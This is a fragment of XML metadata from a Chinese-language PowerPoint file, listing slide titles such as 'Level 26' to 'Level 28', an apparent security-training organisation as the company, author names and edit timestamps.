      <vt:lpstr>PowerPoint 演示文稿</vt:lpstr>
      <vt:lpstr>第二十六关</vt:lpstr>
      <vt:lpstr>第二十六关</vt:lpstr>
      <vt:lpstr>第二十七关</vt:lpstr>
      <vt:lpstr>第二十七关</vt:lpstr>
      <vt:lpstr>第二十八关</vt:lpstr>
      <vt:lpstr>第二十八关</vt:lpstr>
    </vt:vector>
  </TitlesOfParts>
  <Company>中国信息安全测评中心:cisp运营中心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沈传宁</dc:creator>
  <cp:lastModifiedBy>随风</cp:lastModifiedBy>
  <cp:revision>3101</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2009-02-11T06:13:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2021-08-20T13:50:51Z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5EC77F3D4641451695A3550036DF892C</vt:lpwstr>
  </property>
</Properties>
</file>